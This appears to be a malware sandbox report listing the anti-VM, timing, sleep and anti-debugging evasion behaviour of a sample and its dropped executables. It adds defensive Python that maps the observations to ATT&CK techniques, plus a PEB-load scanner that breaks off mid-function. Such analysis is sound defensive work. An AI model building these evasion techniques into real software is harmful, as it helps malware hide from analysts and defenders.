                          Source: C:\Users\user\AppData\Local\Temp\8783.exe, RDTSC instruction interceptor: First address: 00000000008841C1 second address: 00000000008841C7 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov edi, esi 0x00000005 push esi 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\8783.exe, RDTSC instruction interceptor: First address: 00000000008841C7 second address: 0000000000794FA4 instructions: 0x00000000 rdtsc 0x00000002 cwd 0x00000004 lahf 0x00000005 inc ecx 0x00000006 push esp 0x00000007 inc ecx 0x00000008 setno cl 0x0000000b cbw 0x0000000d push ebx 0x0000000e inc cx 0x00000010 movzx esi, ch 0x00000013 inc ecx 0x00000014 mov cl, E5h 0x00000016 push edi 0x00000017 jmp 00007FB310DB2E74h 0x0000001c pushfd 0x0000001d cwde 0x0000001e bswap eax 0x00000020 push ebp 0x00000021 cwd 0x00000023 dec ecx 0x00000024 ror edi, 03h 0x00000027 jmp 00007FB310DDF220h 0x0000002c dec esp 0x0000002d lea edi, dword ptr [FF86B0BCh] 0x00000033 inc ecx 0x00000034 push edi 0x00000035 inc ecx 0x00000036 add dh, 00000065h 0x00000039 inc cx 0x0000003b rcr ecx, 29h 0x0000003e dec esp 0x0000003f mov ecx, dword ptr [esp+00000090h] 0x00000046 cwd 0x00000048 inc ecx 0x00000049 neg ecx 0x0000004b rcl esi, cl 0x0000004d inc ecx 0x0000004e ror ecx, 02h 0x00000051 inc ecx 0x00000052 inc ecx 0x00000054 dec ebp 0x00000055 and esi, edi 0x00000057 inc ebp 0x00000058 test bl, bl 0x0000005a inc ecx 0x0000005b bswap ecx 0x0000005d dec ebp 0x0000005e add ecx, edi 0x00000060 inc cx 0x00000062 rol esi, FFFFFFA4h 0x00000065 dec eax 0x00000066 mov esi, esp 0x00000068 inc ecx 0x00000069 adc bl, FFFFFFD9h 0x0000006c dec eax 0x0000006d sub esp, 00000140h 0x00000073 dec eax 0x00000074 cwde 0x00000075 inc bp 0x00000077 btr esi, esi 0x0000007a cbw 0x0000007c dec eax 0x0000007d and esp, FFFFFFF0h 0x00000083 dec eax 0x00000084 bt edx, edi 0x00000087 dec ebp 0x00000088 mov esi, ecx 0x0000008a btc dx, FFDCh 0x0000008f dec ebp 0x00000090 movzx ebx, cx 0x00000093 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\8783.exe, RDTSC instruction interceptor: First address: 000000000083A52F second address: 000000000083A535 instructions: 0x00000000 rdtsc 0x00000002 dec cl 0x00000004 neg cl 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\9DFA.exe, RDTSC instruction interceptor: First address: 00000000008841C1 second address: 00000000008841C7 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov edi, esi 0x00000005 push esi 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\9DFA.exe, RDTSC instruction interceptor: First address: 00000000008841C7 second address: 0000000000794FA4 instructions: 0x00000000 rdtsc 0x00000002 cwd 0x00000004 lahf 0x00000005 inc ecx 0x00000006 push esp 0x00000007 inc ecx 0x00000008 setno cl 0x0000000b cbw 0x0000000d push ebx 0x0000000e inc cx 0x00000010 movzx esi, ch 0x00000013 inc ecx 0x00000014 mov cl, E5h 0x00000016 push edi 0x00000017 jmp 00007FB310DB2E14h 0x0000001c pushfd 0x0000001d cwde 0x0000001e bswap eax 0x00000020 push ebp 0x00000021 cwd 0x00000023 dec ecx 0x00000024 ror edi, 03h 0x00000027 jmp 00007FB310DDF1C0h 0x0000002c dec esp 0x0000002d lea edi, dword ptr [FF86B0BCh] 0x00000033 inc ecx 0x00000034 push edi 0x00000035 inc ecx 0x00000036 add dh, 00000065h 0x00000039 inc cx 0x0000003b rcr ecx, 29h 0x0000003e dec esp 0x0000003f mov ecx, dword ptr [esp+00000090h] 0x00000046 cwd 0x00000048 inc ecx 0x00000049 neg ecx 0x0000004b rcl esi, cl 0x0000004d inc ecx 0x0000004e ror ecx, 02h 0x00000051 inc ecx 0x00000052 inc ecx 0x00000054 dec ebp 0x00000055 and esi, edi 0x00000057 inc ebp 0x00000058 test bl, bl 0x0000005a inc ecx 0x0000005b bswap ecx 0x0000005d dec ebp 0x0000005e add ecx, edi 0x00000060 inc cx 0x00000062 rol esi, FFFFFFA4h 0x00000065 dec eax 0x00000066 mov esi, esp 0x00000068 inc ecx 0x00000069 adc bl, FFFFFFD9h 0x0000006c dec eax 0x0000006d sub esp, 00000140h 0x00000073 dec eax 0x00000074 cwde 0x00000075 inc bp 0x00000077 btr esi, esi 0x0000007a cbw 0x0000007c dec eax 0x0000007d and esp, FFFFFFF0h 0x00000083 dec eax 0x00000084 bt edx, edi 0x00000087 dec ebp 0x00000088 mov esi, ecx 0x0000008a btc dx, FFDCh 0x0000008f dec ebp 0x00000090 movzx ebx, cx 0x00000093 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\9DFA.exe, RDTSC instruction interceptor: First address: 000000000083A52F second address: 000000000083A535 instructions: 0x00000000 rdtsc 0x00000002 dec cl 0x00000004 neg cl 0x00000006 rdtsc
                          Checks if the current machine is a virtual machine (disk enumeration)
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exe, Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\rifsswe, Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exe, Evasive API call chain: GetPEB, DecisionNodes, Sleep
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exe, Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
                          Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                          Contains functionality to detect sleep reduction / modifications
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exe, Code function: 16_2_00406AA0
                          Found evasive API chain (may stop execution after checking computer name)
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exe, Evasive API call chain: GetComputerName,DecisionNodes,Sleep
                          Source: C:\Windows\explorer.exe TID: 1548, Thread sleep count: 623 > 30
                          Source: C:\Windows\explorer.exe TID: 5420, Thread sleep count: 315 > 30
                          Source: C:\Windows\explorer.exe TID: 5420, Thread sleep time: -31500s >= -30000s
                          Source: C:\Windows\explorer.exe TID: 4868, Thread sleep count: 276 > 30
                          Source: C:\Windows\explorer.exe TID: 6544, Thread sleep count: 422 > 30
                          Source: C:\Windows\explorer.exe TID: 6528, Thread sleep count: 234 > 30
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exe TID: 6128, Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 6912, Thread sleep time: -210000s >= -30000s
                          Source: C:\Windows\SysWOW64\svchost.exe TID: 7124, Thread sleep count: 40 > 30
                          Source: C:\Windows\SysWOW64\svchost.exe TID: 7124, Thread sleep time: -40000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exe TID: 5808, Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exe TID: 3492, Thread sleep time: -60000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\E748.exe, Last function: Thread delayed
                          Source: C:\Windows\System32\conhost.exe, Last function: Thread delayed
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe, Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                          Source: C:\Users\user\AppData\Local\Temp\E748.exe, Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exe, Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\explorer.exe, Window / User API: threadDelayed 623
                          Source: C:\Windows\explorer.exe, Window / User API: threadDelayed 422
                          Source: C:\Users\user\AppData\Local\Temp\9334.exe, API coverage: 8.1 %
                          Source: C:\Users\user\AppData\Local\Temp\E748.exe, API coverage: 6.0 %
                          Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe, API coverage: 7.3 %
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exe, Code function: 16_2_00406AA0
                          Source: C:\Windows\explorer.exe, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\C7FA.exe
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeEvaded block: after key decision
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\F65C.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                          Source: C:\Users\user\AppData\Local\Temp\5C89.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                          Source: svchost.exe, 0000001C.00000002.825243630.000001C020EF6000.00000004.00000001.sdmpBinary or memory string: "@Hyper-V RAW
                          Source: explorer.exe, 00000005.00000000.713141284.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: 5C89.exe, 00000026.00000002.1045877274.0000000005215000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW<
                          Source: explorer.exe, 00000005.00000000.702279429.000000000A897000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAY
                          Source: explorer.exe, 00000005.00000000.695877577.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: explorer.exe, 00000005.00000000.713141284.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: WerFault.exe, 0000000F.00000002.804479717.0000000004E25000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.800924790.0000000004DB9000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000002.804189922.0000000004DB9000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.800840679.0000000004E25000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.800707406.0000000004E25000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000002.824833517.000001C020EA6000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000002.825189731.000001C020EEC000.00000004.00000001.sdmp, 5C89.exe, 00000026.00000002.1045877274.0000000005215000.00000004.00000001.sdmp, 5C89.exe, 00000026.00000002.987388003.0000000002FDE000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
                          Source: explorer.exe, 00000005.00000000.707345140.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
                          Source: explorer.exe, 00000005.00000000.702098679.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
                          Source: svchost.exe, 00000022.00000002.955589491.0000000000C00000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-Cn
                          Source: explorer.exe, 00000005.00000000.702137033.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
                          Source: WerFault.exe, 0000000F.00000003.800924790.0000000004DB9000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000002.804189922.0000000004DB9000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWkC!-
                          Source: WerFault.exe, 0000000F.00000003.798946162.0000000004E25000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.798514036.0000000004E28000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: explorer.exe, 00000005.00000000.702098679.000000000A716000.00000004.00000001.sdmpBinary or memory string: -98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&^
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeProcess information queried: ProcessInformation
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: 17_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeCode function: 0_2_00419BC1 BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,SetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameA,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeW,FindFirstFileExW,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\Desktop\tijXCZsbGe.exeSystem information queried: ModuleInformation
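The entries above are raw sandbox observations; what an analyst usually wants from them is a per-process view of which evasion tricks each dropped component relies on. The Python below is an added example written for this page, not output or code from Joe Sandbox or from the sample: it parses lines in the "Source: subject | observation" form used in this section into ATT&CK techniques (T1497.001 system checks, T1497.003 time-based evasion). The sample lines are copied from this section; the extra WMI classes, the VirtualBox/QEMU markers and the threshold for calling a delay "unbounded" are the example's own assumptions.

```python
import re
from collections import defaultdict

# Constructed input: a handful of lines copied from the evasion section of this report.
SAMPLE = r"""
Source: C:\Users\user\AppData\Local\Temp\DB31.exe | Evasive API call chain: GetPEB, DecisionNodes, Sleep
Source: C:\Users\user\AppData\Local\Temp\F65C.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\explorer.exe TID: 1548 | Thread sleep count: 623 > 30
Source: C:\Users\user\AppData\Local\Temp\F65C.exe TID: 6128 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\DB31.exe | Evasive API call chain: GetComputerName,DecisionNodes,Sleep
Source: explorer.exe, 00000005.00000000.713141284.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000001C.00000002.825243630.000001C020EF6000.00000004.00000001.sdmp | Binary or memory string: "@Hyper-V RAW
"""

LINE_RE = re.compile(r"^Source:\s*(?P<subject>.+?)(?:\s+TID:\s*\d+)?\s*\|\s*(?P<detail>.*)$")
SLEEP_COUNT_RE = re.compile(r"Thread sleep count:\s*(\d+)\s*>\s*(\d+)")
SLEEP_TIME_RE = re.compile(r"Thread sleep time:\s*(-?\d+)s\s*>=\s*(-?\d+)s")
WMI_RE = re.compile(r"SELECT\s+\*\s+FROM\s+(Win32_\w+)", re.I)
CHAIN_RE = re.compile(r"Evasive API call chain:\s*([\w, ]+)")
MEMSTR_RE = re.compile(r"Binary or memory string:\s*(.*)")

# WMI classes used to fingerprint a hypervisor. DiskDrive, Processor and
# VideoController appear on this page; the other two are assumed companions.
VM_WMI_CLASSES = {"win32_diskdrive", "win32_processor", "win32_videocontroller",
                  "win32_computersystem", "win32_bios"}
# Device-ID substrings that betray a hypervisor. VMware/Hyper-V markers are on
# the page; "vbox" and "qemu" are added by the example author.
HV_MARKERS = ("vmware", "necvmwar", "hyper-v", "virtual_disk", "vbox", "qemu")
# Assumed threshold: a single delay this long is "sleep forever", not a timer.
UNBOUNDED_DELAY_S = 10**9


def process_name(subject):
    """Reduce 'C:\\...\\DB31.exe' or 'explorer.exe, <dump id>' to the image name."""
    subject = subject.split(",")[0].strip()
    return subject.replace("/", "\\").split("\\")[-1]


def classify(detail):
    """Map one observation to (ATT&CK technique, short note), or None if it is not an evasion."""
    m = SLEEP_COUNT_RE.search(detail)
    if m:
        return ("T1497.003", f"sleep loop, {m.group(1)} calls")
    m = SLEEP_TIME_RE.search(detail)
    if m:
        secs = abs(int(m.group(1)))
        return ("T1497.003", "unbounded delay" if secs >= UNBOUNDED_DELAY_S else f"{secs}s delay")
    m = WMI_RE.search(detail)
    if m and m.group(1).lower() in VM_WMI_CLASSES:
        return ("T1497.001", f"WMI {m.group(1)}")
    m = CHAIN_RE.search(detail)
    if m:
        head = m.group(1).split(",")[0].strip()      # the API whose result drives the branch
        return ("T1497.001", f"decision on {head}")
    m = MEMSTR_RE.search(detail)
    if m:
        hits = [h for h in HV_MARKERS if h in m.group(1).lower()]
        if hits:
            return ("T1497.001", "hypervisor artifact " + "/".join(hits))
    return None


def summarize(text):
    """Return {image name: sorted list of (technique, note)} over all matching lines."""
    out = defaultdict(set)
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        hit = classify(m.group("detail"))
        if hit:
            out[process_name(m.group("subject"))].add(hit)
    return {k: sorted(v) for k, v in out.items()}


if __name__ == "__main__":
    for image, hits in summarize(SAMPLE).items():
        print(image, hits)
```

Feeding the whole section through `summarize` gives the triage view directly: DB31.exe branches on PEB and computer-name checks, F65C.exe combines WMI hardware queries with an unbounded delay, and the injected explorer.exe and svchost.exe carry hypervisor device strings in memory.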

Anti Debugging:

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\tijXCZsbGe.exe | System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\rifsswe | System information queried: CodeIntegrityInformation
Source: C:\Users\user\Desktop\tijXCZsbGe.exe | Code function: 0_2_0042D9F0 LoadLibraryW,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
Source: C:\Users\user\AppData\Roaming\rifsswe | Code function: 9_2_00630042 push dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\9334.exe | Code function: 11_2_00470083 push dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\9334.exe | Code function: 11_2_0048092B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\9334.exe | Code function: 11_2_00480D90 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\DB31.exe | Code function: 16_2_00401000 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\DB31.exe | Code function: 16_2_0040C180 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\E748.exe | Code function: 17_2_0063092B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\E748.exe | Code function: 17_2_00630D90 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\E748.exe | Code function: 17_2_00893515 push dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\tijXCZsbGe.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\rifsswe | Process queried: DebugPort
Source: C:\Users\user\Desktop\tijXCZsbGe.exe | Code function: 0_2_0043B960 IsDebuggerPresent,DebuggerProbe,
Source: C:\Users\user\AppData\Local\Temp\DB31.exe | Code function: 16_2_004048D0 VirtualProtect ?,00000004,00000100,00000000
Source: C:\Users\user\Desktop\tijXCZsbGe.exe | Code function: 0_2_0042CDF2 InterlockedIncrement,__itow_s,__invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,_wcscpy_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,__snwprintf_s,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,GetFileType,_wcslen,WriteConsoleW,GetLastError,__invoke_watson_if_oneof,_wcslen,WriteFile,WriteFile,OutputDebugStringW,__itow_s,__invoke_watson_if_error,___crtMessageWindowW,
Source: C:\Users\user\Desktop\tijXCZsbGe.exe | Code function: 0_2_00419E0A SetLastError,GetConsoleCursorInfo,GetProfileStringA,WriteProfileSectionW,GetProfileStringA,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryW,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeaps,WritePrivateProfileStringA,GetPriorityClass,
Source: C:\Users\user\AppData\Local\Temp\F65C.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\DB31.exe | Memory protected: page guard
Source: C:\Users\user\Desktop\tijXCZsbGe.exe | Code function: 0_2_0043AD20 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\tijXCZsbGe.exe | Code function: 0_2_00422E10 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\tijXCZsbGe.exe | Code function: 0_2_0042BF30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\tijXCZsbGe.exe | Code function: 0_2_004287A0 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\9334.exe | Code function: 11_2_0040976C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\E748.exe | Code function: 17_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe | Code function: 32_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
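Several of the code-function entries above are reads of fs:[30h], the 32-bit PEB pointer, which is where BeingDebugged, NtGlobalFlag and NumberOfProcessors (the PEB field named in the evasion section) live. The scanner below is an added example, not code from the sample or the sandbox: it finds the three common encodings of a PEB load in a raw x86 code blob (`mov eax, fs:[30h]`, `mov r32, fs:[30h]`, and `push dword ptr fs:[30h]` followed by a `pop`) and reports which PEB field is read next. The byte string it runs on is constructed for the example rather than taken from the sample, and the opcode whitelist used to recognise the follow-up field read is a heuristic chosen by the example author.

```python
REG = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
# 32-bit PEB offsets that anti-analysis code typically reads right after fetching fs:[30h]
PEB_FIELDS = {0x02: "BeingDebugged", 0x18: "ProcessHeap",
              0x64: "NumberOfProcessors", 0x68: "NtGlobalFlag"}
FS30 = b"\x30\x00\x00\x00"
# Opcode bytes that plausibly sit in front of a [reg+disp8] modrm when a field is
# read or compared (mov r32/r8, movzx, cmp/test forms). Heuristic, assumed.
FIELD_OPCODES = {0x8B, 0x8A, 0xB6, 0x80, 0x83, 0x38, 0x3A}


def find_peb_loads(code):
    """Yield (offset, length, register) for each fs:[30h] load in the blob."""
    i, n = 0, len(code)
    while i < n:
        if code[i] == 0x64:                                   # FS segment override
            # 64 A1 30 00 00 00            mov eax, fs:[30h]
            if code[i + 1:i + 2] == b"\xA1" and code[i + 2:i + 6] == FS30:
                yield i, 6, "eax"
                i += 6
                continue
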